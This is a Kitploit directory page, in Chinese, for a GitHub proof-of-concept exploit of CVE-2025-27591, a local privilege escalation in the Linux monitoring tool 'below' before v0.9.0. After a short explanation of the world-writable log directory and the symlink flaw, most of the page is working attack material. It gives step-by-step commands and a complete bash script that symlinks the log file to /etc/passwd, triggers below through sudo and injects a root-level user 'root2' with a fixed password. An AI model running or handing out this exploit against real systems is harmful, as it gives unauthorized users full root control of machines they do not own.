Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-27591-below- — 通过 `below` 的本地权限提升 (CVE-2025-27591) - PoC 漏洞利用 | Kitploit
工具/GitHubGitHub/visaicyber/cve-2025-27591-below-
权限提升漏洞分析漏洞利用渗透测试错误配置
GitHubvisaicyber/cve-2025-27591-below-

CVE-2025-27591-below-

通过 `below` 的本地权限提升 (CVE-2025-27591) - PoC 漏洞利用

查看仓库
211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-27591 – Below 中的权限提升

1) 简介

Below 是一款用于记录和显示系统数据(如硬件利用率和 cgroup 指标)的 Linux 工具。

在 v0.9.0 之前的版本中,Below 的 systemd 服务以 root 权限运行,并在 /var/log/below 下创建全局可写的日志目录和文件。这种不安全的配置使得 符号链接攻击 成为可能,允许无特权的本地用户将权限提升至 root。

该问题被分配了 CVE-2025-27591。
上游在 v0.9.0 中修复了此问题。


2) 漏洞 – /var/log/below 中的符号链接攻击

  • Below 在运行时确保 /var/log/below 具有 0777 权限。
  • 它还会以 0666 权限创建 /var/log/below/error_root.log。
  • 由于该目录是全局可写的,攻击者可以将日志文件替换为指向任意敏感文件(如 /etc/passwd)的符号链接。
  • 当 Below 以 root 身份写入日志时,它会写入符号链接指向的目标,从而允许权限提升。

这种行为绕过了内核的 protected_symlinks 加固机制,因为未设置粘滞位。


3) 利用

通过将 error_root.log 指向 /etc/passwd,我们可以注入一个具有已知密码的新 root 用户。

步骤

步骤 1:备份 /etc/passwd。 在修改系统文件之前请务必备份:

root@kitploit:~
cp /etc/passwd /tmp/passwd.bak

步骤 2:生成恶意用户条目

root@kitploit:~
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload

步骤 3:创建指向漏洞日志的符号链接

root@kitploit:~
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

步骤 4:触发日志创建

root@kitploit:~
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

步骤 5:覆盖 /etc/passwd

root@kitploit:~
cat /tmp/payload > /var/log/below/error_root.log

步骤 6:切换到新的 root 用户

root@kitploit:~
su root2
# password: rooted123

4) 概念验证 (PoC):运行此脚本

root@kitploit:~
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'

TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"

echo "[*] CVE-2025-27591 Privilege Escalation Exploit"

# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
  echo "[!] 'below' is not available via sudo. Exiting."
  exit 1
fi

# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"

# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')

# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"

# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"

# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"

# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
CVE-2025-27591
下载工具